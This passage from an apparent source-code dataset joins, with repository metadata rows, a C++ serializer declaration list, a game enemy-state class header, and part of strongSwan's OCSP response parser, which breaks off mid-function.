// Serializer for java.util.List<java.lang.Boolean>
void BSerializer_1617670280(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.Byte>
void BSerializer_1059148284(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.Character>
void BSerializer_1661807911(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.Double>
void BSerializer_1555345627(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.Float>
void BSerializer_1628501332(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.Integer>
void BSerializer_181681714(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.Long>
void BSerializer_1050216688(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.Short>
void BSerializer_1997002548(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.lang.String>
void BSerializer_2123584667(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.util.Date>
void BSerializer_1504867122(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.util.List<byps.test.api.inl.Point2D>>
void BSerializer_1823330785(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.util.List<int[][][][]>>
void BSerializer_1865834185(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.util.List<java.lang.Integer>>
void BSerializer_1746702954(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.util.Map<java.lang.Integer,java.util.List<java.util.TreeSet<java.lang.Integer>>>>
void BSerializer_1633500852(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.List<java.util.TreeSet<java.lang.Integer>>
void BSerializer_724129228(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Byte,java.lang.Double>
void BSerializer_1487265161(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Character,java.lang.Float>
void BSerializer_94341197(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,byps.test.api.inl.Point2D>
void BSerializer_1358523233(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,byps.test.api.prim.PrimitiveTypes>
void BSerializer_1831201218(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,byte[]>
void BSerializer_1799280818(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,int[]>
void BSerializer_1633750383(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,java.io.InputStream>
void BSerializer_779528402(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,java.lang.Integer>
void BSerializer_1347703734(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,java.util.List<java.lang.String>>
void BSerializer_132175071(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Integer,java.util.List<java.util.TreeSet<java.lang.Integer>>>
void BSerializer_49984088(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Long,java.lang.Short>
void BSerializer_601099730(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.Short,java.lang.Long>
void BSerializer_1973996106(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.String,byps.test.api.enu.EnumPlanets>
void BSerializer_493795497(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.String,byps.test.api.inherit.Class1>
void BSerializer_2058676657(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.String,byps.test.api.refs.Node>
void BSerializer_2011881553(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.String,java.lang.Boolean>
void BSerializer_1279823631(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.String,java.lang.Object>
void BSerializer_1488550492(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.String,java.lang.String>
void BSerializer_1710660846(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Map<java.lang.String,java.util.Date>
void BSerializer_1366799209(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<byps.test.api.inherit.Class1>
void BSerializer_484881308(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<byps.test.api.prim.PrimitiveTypes>
void BSerializer_673917574(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<byte[]>
void BSerializer_2052431866(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<int[]>
void BSerializer_1406124761(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.lang.Boolean>
void BSerializer_1365696060(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.lang.Double>
void BSerializer_1320560671(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.lang.Float>
void BSerializer_1898022288(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.lang.Integer>
void BSerializer_1493282670(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.lang.Long>
void BSerializer_1457164460(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.lang.Short>
void BSerializer_2028443792(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.lang.String>
void BSerializer_1888799711(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.Set<java.util.Date>
void BSerializer_1097919350(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.TreeMap<java.lang.Float,java.lang.Character>
void BSerializer_8789515(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.TreeMap<java.lang.Integer,java.io.InputStream>
void BSerializer_476459792(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.TreeSet<java.lang.Character>
void BSerializer_936607009(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for java.util.TreeSet<java.lang.Integer>
void BSerializer_855786668(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for long[]
void BSerializer_1097129250(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for long[][][][]
void BSerializer_846419204(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for short[]
void BSerializer_2067161310(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for short[][][][]
void BSerializer_1859644668(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
}}}
#endif
| 37.684699 | 476 | 0.745263 |
1f3be36149876e6d9b80d4f73831781df9b95eca | 2,117 | h | C | Build/hosClient/MeleeFrogState.h | Game-institute-1st-While-true/PLUXER | 4ec9ad0ccb1bdf4b221afa135482a458f06205b1 | [
"MIT"
] | 1 | 2021-07-27T04:14:40.000Z | 2021-07-27T04:14:40.000Z | Build/hosClient/MeleeFrogState.h | Game-institute-1st-While-true/PLUXER | 4ec9ad0ccb1bdf4b221afa135482a458f06205b1 | [
"MIT"
] | null | null | null | Build/hosClient/MeleeFrogState.h | Game-institute-1st-While-true/PLUXER | 4ec9ad0ccb1bdf4b221afa135482a458f06205b1 | [
"MIT"
] | 1 | 2021-07-27T04:14:44.000Z | 2021-07-27T04:14:44.000Z | #pragma once
#include "hosEngine/Com_Client.h"
#include "NoteManager.h"
#include "PlayerState.h"
class MeleeFrogState : public hos::com::Script
{
public:
enum class MeleeFrogActionList
{
Idle, Damaged, Dead, Attak1, Attak2, Move
};
private:
MeleeFrogActionList NowAction = MeleeFrogActionList::Idle;
MeleeFrogActionList PrevAction = MeleeFrogActionList::Idle;
float MaxHealthPoint = 690.f;
float HealthPoint = MaxHealthPoint;
bool IsAnimationEnd = false;
float AnimationTimeScale = 1.f;
bool IsInDetect = false;
bool IsInAttack = false;
bool IsActivation = false;
float NowHitValue = 0.f;
float AddDamage = 0.f;
bool IsDamaged = false;
public:
hos::com::Animation* MeleeFrogAnimation = nullptr;
hos::com::SphereCollision* DamagedArea = nullptr;
PlayerState* m_PlayerState = nullptr;
hos::com::AudioSource* ActionSound = nullptr;
//////////////////////////////////////////////////////////////////////////
// UI
hos::com::GameObject* HPBar = nullptr;
hos::com::UIImage* HPUI = nullptr;
hos::com::UIText* DamageUI = nullptr;
hos::com::UIText* DamageUIBack = nullptr;
public:
MeleeFrogState();
virtual ~MeleeFrogState();
public:
MeleeFrogState::MeleeFrogActionList GetNowAction() const { return NowAction; };
void SetNowAction(MeleeFrogActionList val);
MeleeFrogState::MeleeFrogActionList GetPrevAction() const { return PrevAction; };
bool GetIsAnimationEnd() const { return IsAnimationEnd; };
float GetAnimationTimeScale() const { return AnimationTimeScale; };
float GetDamaged(float damage, int damagedType);
float GetHealthPoint() const { return HealthPoint; };
bool GetIsInDetect() const { return IsInDetect; };
bool GetIsInAttack() const { return IsInAttack; };
bool GetIsActivation() const { return IsActivation; };
void SetIsActivation(bool val) { IsActivation = val; };
public:
void Reset() override;
void Awake() override;
void Start() override;
void Update() override;
void LateUpdate() override;
void OnEnable() override;
void Render() override;
private:
void PlayerSmashTime();
void PlayerFeverTime();
void PlayerDetect();
void ShowUI();
};
| 25.817073 | 82 | 0.720831 |
1f89299588c9df54deb4a737ba7e2b35617ea6bb | 23,966 | c | C | ConfProfile/jni/strongswan/src/libstrongswan/plugins/x509/x509_ocsp_response.c | Infoss/conf-profile-4-android | 619bd63095bb0f5a67616436d5510d24a233a339 | [
"MIT"
] | null | null | null | ConfProfile/jni/strongswan/src/libstrongswan/plugins/x509/x509_ocsp_response.c | Infoss/conf-profile-4-android | 619bd63095bb0f5a67616436d5510d24a233a339 | [
"MIT"
] | 5 | 2016-01-25T18:04:42.000Z | 2016-02-25T08:54:56.000Z | ConfProfile/jni/strongswan/src/libstrongswan/plugins/x509/x509_ocsp_response.c | Infoss/conf-profile-4-android | 619bd63095bb0f5a67616436d5510d24a233a339 | [
"MIT"
] | 2 | 2016-01-25T17:14:17.000Z | 2016-02-13T20:14:09.000Z | /**
* Copyright (C) 2008-2009 Martin Willi
* Copyright (C) 2007 Andreas Steffen
* Hochschule fuer Technik Rapperswil
* Copyright (C) 2003 Christoph Gysin, Simon Zwahlen
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version. See <http://www.fsf.org/copyleft/gpl.txt>.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
* or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* for more details.
*/
#include "x509_ocsp_response.h"
#include <time.h>
#include <asn1/oid.h>
#include <asn1/asn1.h>
#include <asn1/asn1_parser.h>
#include <utils/identification.h>
#include <collections/linked_list.h>
#include <utils/debug.h>
#include <library.h>
#include <credentials/certificates/x509.h>
#include <credentials/certificates/crl.h>
/**
* how long do we use an OCSP response without a nextUpdate
*/
#define OCSP_DEFAULT_LIFETIME 30
typedef struct private_x509_ocsp_response_t private_x509_ocsp_response_t;
/**
* Private data of a ocsp_t object.
*/
struct private_x509_ocsp_response_t {
/**
* Public interface for this ocsp object.
*/
x509_ocsp_response_t public;
/**
* complete encoded OCSP response
*/
chunk_t encoding;
/**
* data for signature verficiation
*/
chunk_t tbsResponseData;
/**
* signature algorithm (OID)
*/
int signatureAlgorithm;
/**
* signature
*/
chunk_t signature;
/**
* name or keyid of the responder
*/
identification_t *responderId;
/**
* time of response production
*/
time_t producedAt;
/**
* latest nextUpdate in this OCSP response
*/
time_t usableUntil;
/**
* list of included certificates
*/
linked_list_t *certs;
/**
* Linked list of OCSP responses, single_response_t
*/
linked_list_t *responses;
/**
* Nonce required for ocsp request and response
*/
chunk_t nonce;
/**
* reference counter
*/
refcount_t ref;
};
/**
* single response contained in OCSP response
*/
typedef struct {
/** hash algorithm OID to for the two hashes */
int hashAlgorithm;
/** hash of issuer DN */
chunk_t issuerNameHash;
/** issuerKeyID */
chunk_t issuerKeyHash;
/** serial number of certificate */
chunk_t serialNumber;
/** OCSP certificate status */
cert_validation_t status;
/** time of revocation, if revoked */
time_t revocationTime;
/** revocation reason, if revoked */
crl_reason_t revocationReason;
/** creation of associated CRL */
time_t thisUpdate;
/** creation of next CRL */
time_t nextUpdate;
} single_response_t;
/* our OCSP response version implementation */
#define OCSP_BASIC_RESPONSE_VERSION 1
/* some OCSP specific prefabricated ASN.1 constants */
static const chunk_t ASN1_nonce_oid = chunk_from_chars(
0x06, 0x09,
0x2B, 0x06,
0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x02
);
static const chunk_t ASN1_response_oid = chunk_from_chars(
0x06, 0x09,
0x2B, 0x06,
0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x04
);
static const chunk_t ASN1_response_content = chunk_from_chars(
0x04, 0x0D,
0x30, 0x0B,
0x06, 0x09,
0x2B, 0x06,
0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x01
);
METHOD(ocsp_response_t, get_status, cert_validation_t,
private_x509_ocsp_response_t *this, x509_t *subject, x509_t *issuer,
time_t *revocation_time, crl_reason_t *revocation_reason,
time_t *this_update, time_t *next_update)
{
enumerator_t *enumerator;
single_response_t *response;
cert_validation_t status = VALIDATION_FAILED;
certificate_t *issuercert = &issuer->interface;
enumerator = this->responses->create_enumerator(this->responses);
while (enumerator->enumerate(enumerator, &response))
{
hasher_t *hasher;
identification_t *id;
cred_encoding_type_t type;
chunk_t hash, fingerprint;
/* check serial first, is cheaper */
if (!chunk_equals(subject->get_serial(subject), response->serialNumber))
{
continue;
}
/* check issuerKeyHash if available */
if (response->issuerKeyHash.ptr)
{
public_key_t *public;
public = issuercert->get_public_key(issuercert);
if (!public)
{
continue;
}
switch (response->hashAlgorithm)
{
case OID_SHA1:
type = KEYID_PUBKEY_SHA1;
break;
default:
public->destroy(public);
continue;
}
if (!public->get_fingerprint(public, type, &fingerprint) ||
!chunk_equals(response->issuerKeyHash, fingerprint))
{
public->destroy(public);
continue;
}
public->destroy(public);
}
/* check issuerNameHash, if available */
else if (response->issuerNameHash.ptr)
{
id = issuercert->get_subject(issuercert);
hasher = lib->crypto->create_hasher(lib->crypto,
hasher_algorithm_from_oid(response->hashAlgorithm));
if (!hasher ||
!hasher->allocate_hash(hasher, id->get_encoding(id), &hash))
{
DESTROY_IF(hasher);
continue;
}
hasher->destroy(hasher);
if (!chunk_equals(hash, response->issuerNameHash))
{
free(hash.ptr);
continue;
}
free(hash.ptr);
}
else
{
continue;
}
/* got a match */
status = response->status;
*revocation_time = response->revocationTime;
*revocation_reason = response->revocationReason;
*this_update = response->thisUpdate;
*next_update = response->nextUpdate;
break;
}
enumerator->destroy(enumerator);
return status;
}
METHOD(ocsp_response_t, create_cert_enumerator, enumerator_t*,
private_x509_ocsp_response_t *this)
{
return this->certs->create_enumerator(this->certs);
}
/**
* ASN.1 definition of singleResponse
*/
static const asn1Object_t singleResponseObjects[] = {
{ 0, "singleResponse", ASN1_SEQUENCE, ASN1_BODY }, /* 0 */
{ 1, "certID", ASN1_SEQUENCE, ASN1_NONE }, /* 1 */
{ 2, "algorithm", ASN1_EOC, ASN1_RAW }, /* 2 */
{ 2, "issuerNameHash", ASN1_OCTET_STRING, ASN1_BODY }, /* 3 */
{ 2, "issuerKeyHash", ASN1_OCTET_STRING, ASN1_BODY }, /* 4 */
{ 2, "serialNumber", ASN1_INTEGER, ASN1_BODY }, /* 5 */
{ 1, "certStatusGood", ASN1_CONTEXT_S_0, ASN1_OPT }, /* 6 */
{ 1, "end opt", ASN1_EOC, ASN1_END }, /* 7 */
{ 1, "certStatusRevoked", ASN1_CONTEXT_C_1, ASN1_OPT }, /* 8 */
{ 2, "revocationTime", ASN1_GENERALIZEDTIME, ASN1_BODY }, /* 9 */
{ 2, "revocationReason", ASN1_CONTEXT_C_0, ASN1_OPT }, /* 10 */
{ 3, "crlReason", ASN1_ENUMERATED, ASN1_BODY }, /* 11 */
{ 2, "end opt", ASN1_EOC, ASN1_END }, /* 12 */
{ 1, "end opt", ASN1_EOC, ASN1_END }, /* 13 */
{ 1, "certStatusUnknown", ASN1_CONTEXT_S_2, ASN1_OPT }, /* 14 */
{ 1, "end opt", ASN1_EOC, ASN1_END }, /* 15 */
{ 1, "thisUpdate", ASN1_GENERALIZEDTIME, ASN1_BODY }, /* 16 */
{ 1, "nextUpdateContext", ASN1_CONTEXT_C_0, ASN1_OPT }, /* 17 */
{ 2, "nextUpdate", ASN1_GENERALIZEDTIME, ASN1_BODY }, /* 18 */
{ 1, "end opt", ASN1_EOC, ASN1_END }, /* 19 */
{ 1, "singleExtensionsContext", ASN1_CONTEXT_C_1, ASN1_OPT }, /* 20 */
{ 2, "singleExtensions", ASN1_SEQUENCE, ASN1_LOOP }, /* 21 */
{ 3, "extension", ASN1_SEQUENCE, ASN1_NONE }, /* 22 */
{ 4, "extnID", ASN1_OID, ASN1_BODY }, /* 23 */
{ 4, "critical", ASN1_BOOLEAN, ASN1_BODY |
ASN1_DEF }, /* 24 */
{ 4, "extnValue", ASN1_OCTET_STRING, ASN1_BODY }, /* 25 */
{ 2, "end loop", ASN1_EOC, ASN1_END }, /* 26 */
{ 1, "end opt", ASN1_EOC, ASN1_END }, /* 27 */
{ 0, "exit", ASN1_EOC, ASN1_EXIT }
};
#define SINGLE_RESPONSE_ALGORITHM 2
#define SINGLE_RESPONSE_ISSUER_NAME_HASH 3
#define SINGLE_RESPONSE_ISSUER_KEY_HASH 4
#define SINGLE_RESPONSE_SERIAL_NUMBER 5
#define SINGLE_RESPONSE_CERT_STATUS_GOOD 6
#define SINGLE_RESPONSE_CERT_STATUS_REVOKED 8
#define SINGLE_RESPONSE_CERT_STATUS_REVOCATION_TIME 9
#define SINGLE_RESPONSE_CERT_STATUS_CRL_REASON 11
#define SINGLE_RESPONSE_CERT_STATUS_UNKNOWN 14
#define SINGLE_RESPONSE_THIS_UPDATE 16
#define SINGLE_RESPONSE_NEXT_UPDATE 18
#define SINGLE_RESPONSE_EXT_ID 23
#define SINGLE_RESPONSE_CRITICAL 24
#define SINGLE_RESPONSE_EXT_VALUE 25
/**
* Parse a single OCSP response
*/
static bool parse_singleResponse(private_x509_ocsp_response_t *this,
chunk_t blob, int level0)
{
asn1_parser_t *parser;
chunk_t object;
int objectID;
bool success = FALSE;
single_response_t *response;
response = malloc_thing(single_response_t);
response->hashAlgorithm = OID_UNKNOWN;
response->issuerNameHash = chunk_empty;
response->issuerKeyHash = chunk_empty;
response->serialNumber = chunk_empty;
response->status = VALIDATION_FAILED;
response->revocationTime = 0;
response->revocationReason = CRL_REASON_UNSPECIFIED;
response->thisUpdate = UNDEFINED_TIME;
/* if nextUpdate is missing, we give it a short lifetime */
response->nextUpdate = this->producedAt + OCSP_DEFAULT_LIFETIME;
parser = asn1_parser_create(singleResponseObjects, blob);
parser->set_top_level(parser, level0);
while (parser->iterate(parser, &objectID, &object))
{
switch (objectID)
{
case SINGLE_RESPONSE_ALGORITHM:
response->hashAlgorithm = asn1_parse_algorithmIdentifier(object,
parser->get_level(parser)+1, NULL);
break;
case SINGLE_RESPONSE_ISSUER_NAME_HASH:
response->issuerNameHash = object;
break;
case SINGLE_RESPONSE_ISSUER_KEY_HASH:
response->issuerKeyHash = object;
break;
case SINGLE_RESPONSE_SERIAL_NUMBER:
response->serialNumber = object;
break;
case SINGLE_RESPONSE_CERT_STATUS_GOOD:
response->status = VALIDATION_GOOD;
break;
case SINGLE_RESPONSE_CERT_STATUS_REVOKED:
response->status = VALIDATION_REVOKED;
break;
case SINGLE_RESPONSE_CERT_STATUS_REVOCATION_TIME:
response->revocationTime = asn1_to_time(&object, ASN1_GENERALIZEDTIME);
break;
case SINGLE_RESPONSE_CERT_STATUS_CRL_REASON:
if (object.len == 1)
{
response->revocationReason = *object.ptr;
}
break;
case SINGLE_RESPONSE_CERT_STATUS_UNKNOWN:
response->status = VALIDATION_FAILED;
break;
case SINGLE_RESPONSE_THIS_UPDATE:
response->thisUpdate = asn1_to_time(&object, ASN1_GENERALIZEDTIME);
break;
case SINGLE_RESPONSE_NEXT_UPDATE:
response->nextUpdate = asn1_to_time(&object, ASN1_GENERALIZEDTIME);
if (response->nextUpdate > this->usableUntil)
{
this->usableUntil = response->nextUpdate;
}
break;
}
}
success = parser->success(parser);
parser->destroy(parser);
if (success)
{
if (this->usableUntil == UNDEFINED_TIME)
{
this->usableUntil = this->producedAt + OCSP_DEFAULT_LIFETIME;
}
this->responses->insert_last(this->responses, response);
}
else
{
free(response);
}
return success;
}
/**
* ASN.1 definition of responses
*/
static const asn1Object_t responsesObjects[] = {
{ 0, "responses", ASN1_SEQUENCE, ASN1_LOOP }, /* 0 */
{ 1, "singleResponse", ASN1_EOC, ASN1_RAW }, /* 1 */
{ 0, "end loop", ASN1_EOC, ASN1_END }, /* 2 */
{ 0, "exit", ASN1_EOC, ASN1_EXIT }
};
#define RESPONSES_SINGLE_RESPONSE 1
/**
* Parse all responses
*/
static bool parse_responses(private_x509_ocsp_response_t *this,
chunk_t blob, int level0)
{
asn1_parser_t *parser;
chunk_t object;
int objectID;
bool success = FALSE;
parser = asn1_parser_create(responsesObjects, blob);
parser->set_top_level(parser, level0);
while (parser->iterate(parser, &objectID, &object))
{
switch (objectID)
{
case RESPONSES_SINGLE_RESPONSE:
if (!parse_singleResponse(this, object,
parser->get_level(parser)+1))
{
goto end;
}
break;
default:
break;
}
}
success = parser->success(parser);
end:
parser->destroy(parser);
return success;
}
/**
* ASN.1 definition of basicResponse
*/
static const asn1Object_t basicResponseObjects[] = {
{ 0, "BasicOCSPResponse", ASN1_SEQUENCE, ASN1_NONE }, /* 0 */
{ 1, "tbsResponseData", ASN1_SEQUENCE, ASN1_OBJ }, /* 1 */
{ 2, "versionContext", ASN1_CONTEXT_C_0, ASN1_NONE |
ASN1_DEF }, /* 2 */
{ 3, "version", ASN1_INTEGER, ASN1_BODY }, /* 3 */
{ 2, "responderIdContext", ASN1_CONTEXT_C_1, ASN1_OPT }, /* 4 */
{ 3, "responderIdByName", ASN1_SEQUENCE, ASN1_OBJ }, /* 5 */
{ 2, "end choice", ASN1_EOC, ASN1_END }, /* 6 */
{ 2, "responderIdContext", ASN1_CONTEXT_C_2, ASN1_OPT }, /* 7 */
{ 3, "responderIdByKey", ASN1_OCTET_STRING, ASN1_BODY }, /* 8 */
{ 2, "end choice", ASN1_EOC, ASN1_END }, /* 9 */
{ 2, "producedAt", ASN1_GENERALIZEDTIME, ASN1_BODY }, /* 10 */
{ 2, "responses", ASN1_SEQUENCE, ASN1_OBJ }, /* 11 */
{ 2, "responseExtensionsContext", ASN1_CONTEXT_C_1, ASN1_OPT }, /* 12 */
{ 3, "responseExtensions", ASN1_SEQUENCE, ASN1_LOOP }, /* 13 */
{ 4, "extension", ASN1_SEQUENCE, ASN1_NONE }, /* 14 */
{ 5, "extnID", ASN1_OID, ASN1_BODY }, /* 15 */
{ 5, "critical", ASN1_BOOLEAN, ASN1_BODY |
ASN1_DEF }, /* 16 */
{ 5, "extnValue", ASN1_OCTET_STRING, ASN1_BODY }, /* 17 */
{ 3, "end loop", ASN1_EOC, ASN1_END }, /* 18 */
{ 2, "end opt", ASN1_EOC, ASN1_END }, /* 19 */
{ 1, "signatureAlgorithm", ASN1_EOC, ASN1_RAW }, /* 20 */
{ 1, "signature", ASN1_BIT_STRING, ASN1_BODY }, /* 21 */
{ 1, "certsContext", ASN1_CONTEXT_C_0, ASN1_OPT }, /* 22 */
{ 2, "certs", ASN1_SEQUENCE, ASN1_LOOP }, /* 23 */
{ 3, "certificate", ASN1_SEQUENCE, ASN1_RAW }, /* 24 */
{ 2, "end loop", ASN1_EOC, ASN1_END }, /* 25 */
{ 1, "end opt", ASN1_EOC, ASN1_END }, /* 26 */
{ 0, "exit", ASN1_EOC, ASN1_EXIT }
};
#define BASIC_RESPONSE_TBS_DATA 1
#define BASIC_RESPONSE_VERSION 3
#define BASIC_RESPONSE_ID_BY_NAME 5
#define BASIC_RESPONSE_ID_BY_KEY 8
#define BASIC_RESPONSE_PRODUCED_AT 10
#define BASIC_RESPONSE_RESPONSES 11
#define BASIC_RESPONSE_EXT_ID 15
#define BASIC_RESPONSE_CRITICAL 16
#define BASIC_RESPONSE_EXT_VALUE 17
#define BASIC_RESPONSE_ALGORITHM 20
#define BASIC_RESPONSE_SIGNATURE 21
#define BASIC_RESPONSE_CERTIFICATE 24
/**
* Parse a basicOCSPResponse
*/
static bool parse_basicOCSPResponse(private_x509_ocsp_response_t *this,
chunk_t blob, int level0)
{
asn1_parser_t *parser;
chunk_t object;
chunk_t responses = chunk_empty;
int objectID;
int extn_oid = OID_UNKNOWN;
u_int responses_level = level0;
certificate_t *cert;
bool success = FALSE;
bool critical;
parser = asn1_parser_create(basicResponseObjects, blob);
parser->set_top_level(parser, level0);
while (parser->iterate(parser, &objectID, &object))
{
switch (objectID)
{
case BASIC_RESPONSE_TBS_DATA:
this->tbsResponseData = object;
break;
case BASIC_RESPONSE_VERSION:
{
u_int version = (object.len)? (1 + (u_int)*object.ptr) : 1;
if (version != OCSP_BASIC_RESPONSE_VERSION)
{
DBG1(DBG_ASN, " ocsp ResponseData version %d not "
"supported", version);
goto end;
}
break;
}
case BASIC_RESPONSE_ID_BY_NAME:
this->responderId = identification_create_from_encoding(
ID_DER_ASN1_DN, object);
DBG2(DBG_ASN, " '%Y'", this->responderId);
break;
case BASIC_RESPONSE_ID_BY_KEY:
this->responderId = identification_create_from_encoding(
ID_KEY_ID, object);
DBG2(DBG_ASN, " '%Y'", this->responderId);
break;
case BASIC_RESPONSE_PRODUCED_AT:
this->producedAt = asn1_to_time(&object, ASN1_GENERALIZEDTIME);
break;
case BASIC_RESPONSE_RESPONSES:
responses = object;
responses_level = parser->get_level(parser)+1;
break;
case BASIC_RESPONSE_EXT_ID:
extn_oid = asn1_known_oid(object);
break;
case BASIC_RESPONSE_CRITICAL:
critical = object.len && *object.ptr;
DBG2(DBG_ASN, " %s", critical ? "TRUE" : "FALSE");
break;
case BASIC_RESPONSE_EXT_VALUE:
if (extn_oid == OID_NONCE)
{
this->nonce = object;
}
break;
case BASIC_RESPONSE_ALGORITHM:
this->signatureAlgorithm = asn1_parse_algorithmIdentifier(object,
parser->get_level(parser)+1, NULL);
break;
case BASIC_RESPONSE_SIGNATURE:
this->signature = object;
break;
case BASIC_RESPONSE_CERTIFICATE:
{
cert = lib->creds->create(lib->creds, CRED_CERTIFICATE,CERT_X509,
BUILD_BLOB_ASN1_DER, object,
BUILD_END);
if (cert)
{
this->certs->insert_last(this->certs, cert);
}
break;
}
}
}
success = parser->success(parser);
end:
parser->destroy(parser);
if (success)
{
if (!this->responderId)
{
this->responderId = identification_create_from_encoding(ID_ANY,
chunk_empty);
}
success = parse_responses(this, responses, responses_level);
}
return success;
}
/**
* ASN.1 definition of ocspResponse
*/
static const asn1Object_t ocspResponseObjects[] = {
{ 0, "OCSPResponse", ASN1_SEQUENCE, ASN1_NONE }, /* 0 */
{ 1, "responseStatus", ASN1_ENUMERATED, ASN1_BODY }, /* 1 */
{ 1, "responseBytesContext", ASN1_CONTEXT_C_0, ASN1_OPT }, /* 2 */
{ 2, "responseBytes", ASN1_SEQUENCE, ASN1_NONE }, /* 3 */
{ 3, "responseType", ASN1_OID, ASN1_BODY }, /* 4 */
{ 3, "response", ASN1_OCTET_STRING, ASN1_BODY }, /* 5 */
{ 1, "end opt", ASN1_EOC, ASN1_END }, /* 6 */
{ 0, "exit", ASN1_EOC, ASN1_EXIT }
};
#define OCSP_RESPONSE_STATUS 1
#define OCSP_RESPONSE_TYPE 4
#define OCSP_RESPONSE 5
/**
* Parse OCSPResponse object
*/
static bool parse_OCSPResponse(private_x509_ocsp_response_t *this)
{
asn1_parser_t *parser;
chunk_t object;
int objectID;
int responseType = OID_UNKNOWN;
bool success = FALSE;
ocsp_status_t status;
parser = asn1_parser_create(ocspResponseObjects, this->encoding);
while (parser->iterate(parser, &objectID, &object))
{
switch (objectID)
{
case OCSP_RESPONSE_STATUS:
status = (ocsp_status_t)*object.ptr;
switch (status)
{
case OCSP_SUCCESSFUL:
break;
default:
DBG1(DBG_LIB, " ocsp response status: %N",
ocsp_status_names, status);
goto end;
}
break;
case OCSP_RESPONSE_TYPE:
